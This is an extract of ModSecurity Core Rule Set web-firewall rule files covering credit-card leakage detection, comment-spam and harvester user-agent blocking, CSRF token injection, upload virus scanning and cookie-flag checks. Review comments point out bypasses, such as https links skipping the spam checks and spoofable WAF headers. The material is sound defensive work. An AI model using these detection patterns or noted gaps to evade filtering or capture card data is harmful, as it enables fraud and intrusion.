(?:^|[^\d])(?<!google_ad_client = \"pub-)(5[1-5]\d{2}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{4})(?:[^\d]|$)" \ "chain,capture,logdata:'Start of CC #: %{tx.ccdata_begin}***...',phase:4,t:none,ctl:auditLogParts=-E,block,msg:'MasterCard Credit Card Number sent from site to 
user',id:'920006',tag:'WASCTC/5.2',tag:'PCI/3.3',severity:'1'" SecRule TX:1 "(\d{4}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{1,4})" "chain,capture,setvar:tx.ccdata=%{tx.1}" SecRule TX:CCDATA "^(\d{4}\-?)" "capture,setvar:tx.ccdata_begin=%{tx.1},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-LEAKAGE/CC-%{matched_var_name}=%{tx.0}" # Visa SecRule RESPONSE_BODY|RESPONSE_HEADERS:Location "@verifyCC (?:^|[^\d])(?<!google_ad_client = \"pub-)(4\d{3}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d(?:\d{3})??)(?:[^\d]|$)" \ "chain,capture,logdata:'Start of CC #: %{tx.ccdata_begin}***...',phase:4,t:none,ctl:auditLogParts=-E,block,msg:'Visa Credit Card Number sent from site to user',id:'920008',tag:'WASCTC/5.2',tag:'PCI/3.3',severity:'1'" SecRule TX:1 "(\d{4}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{1,4})" "chain,capture,setvar:tx.ccdata=%{tx.1}" SecRule TX:CCDATA "^(\d{4}\-?)" "capture,setvar:tx.ccdata_begin=%{tx.1},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-LEAKAGE/CC-%{matched_var_name}=%{tx.0}" # American Express SecRule RESPONSE_BODY|RESPONSE_HEADERS:Location "@verifyCC (?:^|[^\d])(?<!google_ad_client = \"pub-)(3[47]\d{2}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{3})(?:[^\d]|$)" \ "chain,capture,logdata:'Start of CC #: %{tx.ccdata_begin}***...',phase:4,t:none,ctl:auditLogParts=-E,block,msg:'American Express Credit Card Number sent from site to user',id:'920010',tag:'WASCTC/5.2',tag:'PCI/3.3',severity:'1'" SecRule TX:1 "(\d{4}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{1,4})" "chain,capture,setvar:tx.ccdata=%{tx.1}" SecRule TX:CCDATA "^(\d{4}\-?)" "capture,setvar:tx.ccdata_begin=%{tx.1},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-LEAKAGE/CC-%{matched_var_name}=%{tx.0}" # Diners Club SecRule RESPONSE_BODY|RESPONSE_HEADERS:Location "@verifyCC (?:^|[^\d])(?<!google_ad_client = \"pub-)((?:30[0-5]|3[68]\d)\d\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{2})(?:[^\d]|$)" \ "chain,capture,logdata:'Start of CC #: 
%{tx.ccdata_begin}***...',phase:4,t:none,ctl:auditLogParts=-E,block,msg:'Diners Club Credit Card Number sent from site to user',id:'920012',tag:'WASCTC/5.2',tag:'PCI/3.3',severity:'1'" SecRule TX:1 "(\d{4}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{1,4})" "chain,capture,setvar:tx.ccdata=%{tx.1}" SecRule TX:CCDATA "^(\d{4}\-?)" "capture,setvar:tx.ccdata_begin=%{tx.1},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-LEAKAGE/CC-%{matched_var_name}=%{tx.0}" # enRoute #SecRule RESPONSE_BODY|RESPONSE_HEADERS:Location "(?:^|[^\d])(?<!google_ad_client = \"pub-)(2(?:014|149)\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{2}|55\d{2}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{3})(?:[^\d]|$)" \ # "chain,capture,logdata:'Start of CC #: %{tx.ccdata_begin}***...',phase:4,t:none,ctl:auditLogParts=-E,block,msg:'enRoute Credit Card Number sent from site to user',id:'920014',tag:'WASCTC/5.2',tag:'PCI/3.3',severity:'1'" # SecRule TX:1 "(\d{4}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{1,4})" "chain,capture,setvar:tx.ccdata=%{tx.1}" # SecRule TX:CCDATA "^(\d{4}\-?)" "capture,setvar:tx.ccdata_begin=%{tx.1},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-LEAKAGE/CC-%{matched_var_name}=%{tx.0}" # Discover SecRule RESPONSE_BODY|RESPONSE_HEADERS:Location "@verifyCC (?:^|[^\d])(?<!google_ad_client = \"pub-)(6(?:011|5\d{2})\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{4})(?:[^\d]|$)" \ "chain,capture,logdata:'Start of CC #: %{tx.ccdata_begin}***...',phase:4,t:none,ctl:auditLogParts=-E,block,msg:'Discover Credit Card Number sent from site to user',id:'920016',tag:'WASCTC/5.2',tag:'PCI/3.3',severity:'1'" SecRule TX:1 "(\d{4}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{1,4})" "chain,capture,setvar:tx.ccdata=%{tx.1}" SecRule TX:CCDATA "^(\d{4}\-?)" "capture,setvar:tx.ccdata_begin=%{tx.1},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-LEAKAGE/CC-%{matched_var_name}=%{tx.0}" # JCB SecRule RESPONSE_BODY|RESPONSE_HEADERS:Location "@verifyCC (?:^|[^\d])(?<!google_ad_client = 
\"pub-)(3\d{3}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{4}|(?:1800|21(?:31|00))\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{3})(?:[^\d]|$)" \ "chain,capture,logdata:'Start of CC #: %{tx.ccdata_begin}***...',phase:4,t:none,ctl:auditLogParts=-E,block,msg:'JCB Credit Card Number sent from site to user',id:'920018',tag:'WASCTC/5.2',tag:'PCI/3.3',severity:'1'" SecRule TX:1 "(\d{4}\-?\d{4}\-?\d{2}\-?\d{2}\-?\d{1,4})" "chain,capture,setvar:tx.ccdata=%{tx.1}" SecRule TX:CCDATA "^(\d{4}\-?)" "capture,setvar:tx.ccdata_begin=%{tx.1},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-LEAKAGE/CC-%{matched_var_name}=%{tx.0}" SecMarker END_KNOWN_CC_OUTBOUND_CHECK ����������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/optional_rules/modsecurity_crs_42_comment_spam.conf��������0000664�0000000�0000000�00000010461�12164572564�0032721�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # Comment spam is an attack against blogs, guestbooks, wikis and other types of # interactive web sites that accept and display hyperlinks submitted by # visitors. The spammers automatically post specially crafted random comments # which include links that point to the spammer's web site. 
The links
# artificially increase the site's search engine ranking and may make the site
# more noticeable in search results.
#

# RBL lookup, cached per client address.
# 981137 skips the DNS lookup when this address was already checked; 981138
# performs the @rbl lookup and, on a match, marks the address as a spammer
# and scores the transaction; 981139 records that the lookup was done when
# there was no match. Both flags expire after 86400 seconds.
# On a match 981138 jumps to END_RBL_CHECK, so 981140 does not add a second
# score to the same transaction.
# NOTE(review): these rules read and write the IP collection; presumably it is
# initialised elsewhere in the rule set - confirm before enabling this file.
SecRule IP:PREVIOUS_RBL_CHECK "@eq 1" "phase:1,id:'981137',t:none,pass,nolog,skipAfter:END_RBL_LOOKUP"
  SecRule REMOTE_ADDR "@rbl sbl-xbl.spamhaus.org" "phase:1,id:'981138',t:none,pass,nolog,auditlog,msg:'RBL Match for SPAM Source',tag:'AUTOMATION/MALICIOUS',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.automation_score=+%{tx.warning_anomaly_score},setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-AUTOMATION/MALICIOUS-%{matched_var_name}=%{matched_var},setvar:ip.spammer=1,expirevar:ip.spammer=86400,setvar:ip.previous_rbl_check=1,expirevar:ip.previous_rbl_check=86400,skipAfter:END_RBL_CHECK"
  SecAction "phase:1,id:'981139',t:none,nolog,pass,setvar:ip.previous_rbl_check=1,expirevar:ip.previous_rbl_check=86400"
SecMarker END_RBL_LOOKUP

# Score requests from an address flagged by an earlier RBL match.
SecRule IP:SPAMMER "@eq 1" "phase:1,id:'981140',t:none,pass,nolog,auditlog,msg:'Request from Known SPAM Source (Previous RBL Match)',tag:'AUTOMATION/MALICIOUS',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.automation_score=+%{tx.warning_anomaly_score},setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-AUTOMATION/MALICIOUS-%{matched_var_name}=%{matched_var}"
SecMarker END_RBL_CHECK

# Known spam / e-mail harvester User-Agents: phrase match against the data
# file first, then the chained regex confirms the match.
# NOTE(review): the rule uses "pass", so status:404 presumably has no effect
# here - confirm.
SecRule REQUEST_HEADERS:User-Agent "@pmFromFile modsecurity_42_comment_spam.data" \
        "chain,phase:2,rev:'2.2.8',t:none,t:lowercase,pass,nolog,auditlog,status:404,msg:'Common SPAM/Email Harvester crawler',id:'958297',tag:'AUTOMATION/MALICIOUS',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.automation_score=+%{tx.warning_anomaly_score},setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:'tx.%{rule.id}-AUTOMATION/MALICIOUS-%{matched_var_name}=%{matched_var}'"
SecRule REQUEST_HEADERS:User-Agent "^(?:m(?:o(?:zilla\/4\.0\+?\(|vable type)|i(?:crosoft url|ssigua)|j12bot\/v1\.0\.8|sie)|e(?:mail(?:collector| ?siphon)|collector)|(?:blogsearchbot-marti|super happy fu)n|i(?:nternet explorer|sc systems irc)|ja(?:karta commons|va(?:\/| )1\.)|c(?:ore-project\/|herrypicker)|p(?:sycheclone|ussycat|ycurl)|(?:grub crawl|omniexplor)er|a(?:utoemailspider|dwords)|w(?:innie poh|ordpress)|nut(?:scrape/|chcvs)|8484 boston project|user(?:[- ]agent:)?|l(?:ibwww-perl|wp)|di(?:amond|gger)|trackback\/|httpproxy|<sc)"

# Prequalifier. Look for <http> first
# If no argument contains "http:", 999011 skips the link rules below.
# NOTE(review): "\bhttp:" does not match "https:", so arguments that contain
# only https links skip the comment spam checks entirely; the same applies to
# the "(http:\/.*?){4}" pattern in 950020. Consider whether https links should
# be covered as well.
SecRule ARGS|ARGS_NAMES "\bhttp:" "phase:2,rev:'2.2.8',t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,skip:1,pass,nolog,id:'999010',severity:'6'"
SecAction phase:2,id:'999011',rev:'2.2.8',pass,nolog,skipAfter:END_COMMENT_SPAM

# Look for 2 ways of posting a link
# The two rules are chained, so both "[url" and "<a" must be present for
# 950923 to fire.
SecRule ARGS|ARGS_NAMES "\[url\b" "phase:2,rev:'2.2.8',t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,chain,ctl:auditLogParts=+E,block,msg:'Comment Spam',id:'950923',severity:'2'"
SecRule ARGS|ARGS_NAMES "\<a" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,setvar:'tx.msg=%{rule.msg}',setvar:tx.automation_score=+%{tx.warning_anomaly_score},setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:'tx.%{rule.id}-AUTOMATION/MALICIOUS-%{matched_var_name}=%{tx.0}'"

# Look for too many links in an argument (Prone to FPs)
SecRule ARGS|ARGS_NAMES "(http:\/.*?){4}" "phase:2,rev:'2.2.8',t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,msg:'Comment Spam',id:'950020',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.automation_score=+%{tx.warning_anomaly_score},setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:'tx.%{rule.id}-AUTOMATION/MALICIOUS-%{matched_var_name}=%{matched_var}'"

SecMarker END_COMMENT_SPAM
���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/optional_rules/modsecurity_crs_43_csrf_protection.conf�����0000664�0000000�0000000�00000006676�12164572564�0033460�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # You must have also activated the 16 session hijacking conf file as # it initiates the Session Collection and creates the CSRF token # # # CSRF Protections # # Must set this directive to On to inject content in the response. # SecContentInjection On # # It is most likely not appropriate to force CSRF tokens/validation on *all* resources. # You should edit the LocationMatch Regular Expression below and specify what resources # you wish to protect. Some ideas would be for post-authentiacation directories, etc... 
# # Limitations - this implementation does not currently work with AJAX # <LocationMatch .*> SecRule &ARGS "@ge 1" "chain,phase:2,id:'981143',t:none,block,msg:'CSRF Attack Detected - Missing CSRF Token.'" SecRule &ARGS:CSRF_TOKEN "!@eq 1" "setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-WEB_ATTACK/CSRF-%{matched_var_name}=%{matched_var}" SecRule &ARGS "@ge 1" "chain,phase:2,id:'981144',t:none,block,msg:'CSRF Attack Detected - Invalid Token.'" SecRule ARGS:CSRF_TOKEN "!@streq %{SESSION.CSRF_TOKEN}" "setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-WEB_ATTACK/CSRF-%{matched_var_name}=%{matched_var}" # # This rule will use Content Injection to append the CSRF Token # SecRule &SESSION:CSRF_TOKEN "@eq 1" "phase:4,id:'981145',t:none,nolog,pass,append:'<html><script language=\"JavaScript\"> \ \ var tokenName = \'CSRF_TOKEN\'; \ var tokenValue = \'%{session.csrf_token}\'; \ \ function updateTags() { \ \ var all = document.all ? 
document.all : document.getElementsByTagName(\'*\'); \ var len = all.length; \ \ for(var i=0; i<len; i++) { \ var e = all[i]; \ \ updateTag(e, \'src\'); \ updateTag(e, \'href\'); \ } \ } \ \ function updateForms() { \ \ var forms = document.getElementsByTagName(\'form\'); \ \ for(i=0; i<forms.length; i++) { \ var html = forms[i].innerHTML; \ \ html += \'<input type=hidden name=\' + tokenName + \' value=\' + tokenValue + \' />\'; \ \ forms[i].innerHTML = html; \ } \ \ } \ \ function updateTag(element, attr) { \ \ var location = element.getAttribute(attr); \ \ if(location != null && location != \'\' && isHttpLink(location)) { \ \ var index = location.indexOf(\'?\'); \ \ if(index != -1) { \ location = location + \'&\' + tokenName + \'=\' + tokenValue; \ } else { \ location = location + \'?\' + tokenName + \'=\' + tokenValue; \ } \ \ element.setAttribute(attr, location); \ \ } \ \ } \ \ function isHttpLink(src) { \ var result = 0; \ \ if(src.substring(0, 4) != \'http\' || src.substring(0, 1) == \'/\') { \ result = 1; \ } \ \ return result; \ } \ \ updateTags(); \ updateForms(); \ \ </script></html>'" </LocationMatch> ������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/optional_rules/modsecurity_crs_46_av_scanning.conf���������0000664�0000000�0000000�00000001453�12164572564�0032532�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. 
# # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # Modify the operator to use the correct AV scanning script/tool # Example tools are in the util directory. # SecRule FILES_TMPNAMES "@inspectFile /bin/runAV" \ "phase:2,t:none,block,msg:'Virus found in uploaded file',id:'950115',tag:'MALICIOUS_SOFTWARE/VIRUS',tag:'PCI/5.1',severity:'2',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-MALICIOUS_SOFTWARE/VIRUS-%{matched_var_name}=%{tx.0}" ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/optional_rules/modsecurity_crs_47_skip_outbound_checks.conf0000664�0000000�0000000�00000001527�12164572564�0034454�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # This ruleset is a complementary to ruleset 34 - Ignore Static. By default, # ruleset 34 doesn't skip inspection for leakages in html/documents. 
# Adding this ruleset to your configuration will cause ModSecurity to also # skip the rules in files # # Skip outbound inspection on requests for text content which have no parameters SecRule TX:text_file_extension "@eq 1" "chain,phase:3,allow,nolog,id:'999008',severity:'6'" SecRule TX:no_parameters "@eq 1" �������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/optional_rules/modsecurity_crs_49_header_tagging.conf������0000664�0000000�0000000�00000006220�12164572564�0033174�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # This file will add Request Header Tagging which allows ModSecurity to communicate # any event/rule matches it finds with the downstream application server. The concept # is similar to that of Anti-SPAM apps for Email (such as SpamAssassin). # # The idea is that if the WAF is in a DetectionOnly mode, it can still share data # with the destination app server and then the app server may choose to inspect # the new WAF request headers and factor in this data into a possible blocking # decision. 
#
# This concept is tremendously useful in a distributed architecture and/or when
# there are Fraud Detection Systems at the app server layer that can correlate
# the WAF data into the overall Fraud Score. This is also useful in Hosting
# Environments where the decision to block may not be as clear.
#

# Nothing to report when the anomaly score is 0.
SecRule TX:ANOMALY_SCORE "@eq 0" "phase:2,id:'900044',t:none,nolog,pass,skipAfter:END_HEADER_TAGGING"

# For each TX variable whose name starts with a digit, export its name as the
# environment variable matched_rule-<counter>, and export the current scores.
# Both rules run in phase:2, so only data recorded by that point is exported.
SecRule TX:/^\d/ "." "phase:2,id:'900045',t:none,nolog,pass,setvar:tx.counter=+1,setenv:matched_rule-%{tx.counter}=%{matched_var_name},setenv:anomaly_score=%{tx.anomaly_score},setenv:sql_injection_score=%{tx.sql_injection_score},setenv:xss_score=%{tx.xss_score}"

# One directive per counter value; each fires only when its env variable is set.
#
# NOTE(review): X-WAF-Events and X-WAF-Score are ordinary request headers, so a
# client can send its own copies. Nothing in this block removes them: "append"
# adds to an existing value, and when no rule matched none of the env
# variables is set, so a client-supplied value would reach the application
# unchanged. If the application trusts these headers, clear the inbound copies
# ahead of the directives below, e.g.:
#   RequestHeader unset X-WAF-Events
#   RequestHeader unset X-WAF-Score
RequestHeader append X-WAF-Events "%{matched_rule-1}e" env=matched_rule-1
RequestHeader append X-WAF-Events "%{matched_rule-2}e" env=matched_rule-2
RequestHeader append X-WAF-Events "%{matched_rule-3}e" env=matched_rule-3
RequestHeader append X-WAF-Events "%{matched_rule-4}e" env=matched_rule-4
RequestHeader append X-WAF-Events "%{matched_rule-5}e" env=matched_rule-5
RequestHeader append X-WAF-Events "%{matched_rule-6}e" env=matched_rule-6
RequestHeader append X-WAF-Events "%{matched_rule-7}e" env=matched_rule-7
RequestHeader append X-WAF-Events "%{matched_rule-8}e" env=matched_rule-8
RequestHeader append X-WAF-Events "%{matched_rule-9}e" env=matched_rule-9
RequestHeader append X-WAF-Events "%{matched_rule-10}e" env=matched_rule-10
RequestHeader append X-WAF-Events "%{matched_rule-11}e" env=matched_rule-11
RequestHeader append X-WAF-Events "%{matched_rule-12}e" env=matched_rule-12
RequestHeader append X-WAF-Events "%{matched_rule-13}e" env=matched_rule-13
RequestHeader append X-WAF-Events "%{matched_rule-14}e" env=matched_rule-14
RequestHeader append X-WAF-Events "%{matched_rule-15}e" env=matched_rule-15
RequestHeader append X-WAF-Events "%{matched_rule-16}e" env=matched_rule-16
RequestHeader append X-WAF-Events "%{matched_rule-17}e" env=matched_rule-17
RequestHeader append X-WAF-Events "%{matched_rule-18}e" 
env=matched_rule-18 RequestHeader append X-WAF-Events "%{matched_rule-19}e" env=matched_rule-19 RequestHeader append X-WAF-Events "%{matched_rule-20}e" env=matched_rule-20 RequestHeader set X-WAF-Score "Total=%{anomaly_score}e; sqli=%{sql_injection_score}e; xss=%{xss_score}e" env=anomaly_score SecMarker END_HEADER_TAGGING ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/optional_rules/modsecurity_crs_55_application_defects.conf�0000664�0000000�0000000�00000033363�12164572564�0034251�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. 
# ---------------------------------------------------------------

# Pattern shared by the checks in this file: a GLOBAL counter is created at 0
# if absent, and the alerting chain runs only while the counter is <= 10.
# Each alert increments the counter and resets its 86400-second expiry, so a
# persistent defect stops being logged once the counter exceeds 10.

##############################################################################
# -=[ Charset Checks ]=-
#
# http://websecuritytool.codeplex.com/wikipage?title=Checks#charset
##############################################################################
#
# [ Charset not set ]
#
# - http://code.google.com/p/browsersec/wiki/Part2#Content_handling_mechanisms
#
SecRule &GLOBAL:MISSING_CHARSET "@eq 0" "phase:5,t:none,nolog,pass,id:'981219',setvar:global.missing_charset=0"
SecRule GLOBAL:MISSING_CHARSET "@le 10" "chain,phase:5,t:none,pass,id:'981220',log,msg:'[Watcher Check] No charset was specified in the HTTP Content-Type header nor the HTML content\'s meta tag.',logdata:'Content-Type Response Header: %{response_content_type}',tag:'WASCTC/WASC-15',tag:'APP_DEFECT/MISCONFIGURATION',tag:'http://code.google.com/p/browsersec/wiki/Part2#Content_handling_mechanisms'"
        SecRule RESPONSE_STATUS "@rx ^2" "chain"
                SecRule RESPONSE_HEADERS:Content-Length "!@streq 0" "chain"
                        SecRule RESPONSE_CONTENT_TYPE "(?i:^(text/html|text/xml|application/xml);?$)" "chain"
                                SecRule RESPONSE_BODY "!@rx (?i:(<meta.*?(content|value)=\"text/html;\s?charset=|<\?xml.*?encoding=))" "setvar:global.missing_charset=+1,expirevar:global.missing_charset=86400"

#
# [ Charset not explicitly set to UTF-8 in HTML/XML content ]
#
# - http://websecuritytool.codeplex.com/wikipage?title=Checks#charset-not-utf8
# - http://code.google.com/p/browsersec/wiki/Part2#Character_set_handling_and_detection
#
SecRule &GLOBAL:CHARSET_NOT_UTF8 "@eq 0" "phase:5,t:none,nolog,pass,id:'981221',setvar:global.charset_not_utf8=0"
SecRule GLOBAL:CHARSET_NOT_UTF8 "@le 10" "chain,phase:5,t:none,pass,id:'981222',log,msg:'[Watcher Check] The charset specified was not utf-8 in the HTTP Content-Type header nor the HTML content\'s meta tag.',logdata:'Content-Type Response Header: %{response_content_type}',tag:'WASCTC/WASC-15',tag:'MISCONFIGURATION',tag:'http://websecuritytool.codeplex.com/wikipage?title=Checks#charset-not-utf8'"
        SecRule RESPONSE_STATUS "@rx ^2" "chain"
                SecRule RESPONSE_CONTENT_TYPE "(?i:(^text/html|^application/xml|^text/xml))" "chain"
                        SecRule RESPONSE_CONTENT_TYPE "!@contains charset=utf-8" "chain,t:none,t:lowercase"
                                SecRule RESPONSE_HEADERS:Content-Length "!@streq 0" "chain"
                                        SecRule RESPONSE_BODY "!@rx (<meta.*?(content|value)=\"text/html;\s?charset=utf-8|<\?xml.*?encoding=\"utf-8\")" "t:none,t:lowercase,setvar:global.charset_not_utf8=+1,expirevar:global.charset_not_utf8=86400"

#
# [ Detect charset mismatches between HTTP header and HTML/XML bodies ]
#
# - http://websecuritytool.codeplex.com/wikipage?title=Checks#charset-mismatch
# - http://code.google.com/p/browsersec/wiki/Part2#Character_set_handling_and_detection
#
# The chain captures the charset from the Content-Type header and from the
# body into tx.charset_header / tx.charset_body and alerts when they differ.
SecRule &GLOBAL:CHARSET_MISMATCH "@eq 0" "phase:5,t:none,nolog,pass,id:'981223',setvar:global.charset_mismatch=0"
SecRule GLOBAL:CHARSET_MISMATCH "@le 10" "chain,phase:5,t:none,pass,id:'981224',log,msg:'[Watcher Check] The charset specified was not the same in the HTTP Content-Type header and in the HTML content\'s meta tag',logdata:'Content-Type Response Header Charset is: %{tx.charset_header} and HTTP Equiv Charset is: %{tx.charset_body}',tag:'WASCTC/WASC-15',tag:'MISCONFIGURATION',tag:'http://websecuritytool.codeplex.com/wikipage?title=Checks#charset-mismatch'"
        SecRule RESPONSE_STATUS "@rx ^2" "chain"
                SecRule RESPONSE_CONTENT_TYPE "(?i:^(text/html|text/xml|application/xml);\s?charset=([^;]*))" "chain,t:none,t:lowercase,capture,setvar:tx.charset_header=%{tx.2}"
                        SecRule RESPONSE_HEADERS:Content-Length "!@streq 0" "chain"
                                SecRule RESPONSE_BODY "(?i)(charset|encoding)=\"?(.*?)\"" "chain,t:none,t:lowercase,capture,setvar:tx.charset_body=%{tx.2}"
                                        SecRule TX:CHARSET_HEADER "!@streq %{tx.charset_body}" "t:none,setvar:global.charset_mismatch=+1,expirevar:global.charset_mismatch=86400"

##############################################################################
# -=[ Cookie Checks ]=-
#
# - http://websecuritytool.codeplex.com/wikipage?title=Checks#cookies
##############################################################################
#
# [ Look for cookies with loosely scoped domain restrictions ]
#
# - http://websecuritytool.codeplex.com/wikipage?title=Checks#cookie-loosely-scoped-domain
# - http://code.google.com/p/browsersec/wiki/Part2#Same-origin_policy_for_cookies
#
SecRule &GLOBAL:LOOSE_DOMAIN_SCOPE "@eq 0" "phase:5,t:none,nolog,pass,id:'981237',setvar:global.loose_domain_scope=0"
SecRule GLOBAL:LOOSE_DOMAIN_SCOPE "@le 10" "chain,phase:5,id:'981238',t:none,pass,log,auditlog,msg:'AppDefect: Loose Domain Cookie Flag Restrictions.',logdata:'Cookie: %{tx.1} and Domain: %{tx.2}.',tag:'WASCTC/WASC-15',tag:'MISCONFIGURATION',tag:'http://websecuritytool.codeplex.com/wikipage?title=Checks#cookie-loosely-scoped-domain'"
        SecRule RESPONSE_HEADERS:/Set-Cookie2?/ "!@rx (?i)domain=(?:(?!\d|-)[a-zA-Z0-9\-]{1,63}(?<!-)\.)([a-zA-Z0-9\-]{1,63}(?<!-)\.)(?:[a-zA-Z]{2,})" "chain,setvar:tx.set-cookie-counter=+1,setvar:tx.%{matched_var_name}_%{tx.set-cookie-counter}=%{matched_var}"
                SecRule TX:/^RESPONSE_HEADERS:Set-Cookie2?_/ "(?i)^(.*?);.*domain=(.*?);" "capture,setvar:global.loose_domain_scope=+1,expirevar:global.loose_domain_scope=86400"

#
# [ Cookie's HttpOnly Flag Was Not Set ]
#
# - http://websecuritytool.codeplex.com/wikipage?title=Checks#cookie-not-setting-httponly-flag
# - https://www.owasp.org/index.php/HttpOnly
#
# NOTE(review): the detection pattern looks order-dependent. The negative
# lookahead is evaluated after a "=" and the leading "(.*?)" can extend to a
# later "=", so a cookie that carries the flag followed by another
# name=value attribute may still be reported as missing it; a cookie whose
# own value contains the word "httponly" may be treated as having the flag.
# Verify with sample Set-Cookie headers before relying on these alerts.
SecRule &GLOBAL:MISSING_HTTPONLY "@eq 0" "phase:5,t:none,nolog,pass,id:'981235',setvar:global.missing_httponly=0"
SecRule GLOBAL:MISSING_HTTPONLY "@le 10" "chain,phase:5,id:'981184',t:none,pass,log,auditlog,msg:'AppDefect: Missing HttpOnly Cookie Flag for %{tx.1}.',tag:'WASCTC/WASC-15',tag:'MISCONFIGURATION',tag:'http://websecuritytool.codeplex.com/wikipage?title=Checks#cookie-not-setting-httponly-flag'"
        SecRule RESPONSE_HEADERS:/Set-Cookie2?/ "(.*?)=(?i)(?!.*httponly.*)(.*$)" "capture,setvar:global.missing_httponly=+1,expirevar:global.missing_httponly=86400"

#
# [ Fix Missing "httponly" Flag ]
#
# Appends "; HttpOnly" only to Set-Cookie headers whose cookie name matches
# one of the session/token name patterns below; other cookies are left as is.
Header edit Set-Cookie "^((?i:(_?(COOKIE|TOKEN)|atlassian.xsrf.token|[aj]?sessionid|(php)?sessid|(asp|jserv|jw)?session[-_]?(id)?|cf(id|token)|sid))=(?i:(?!httponly).)+)$" "$1; HttpOnly"

#
# [ Cookie's Secure Flag Was Not Set ]
#
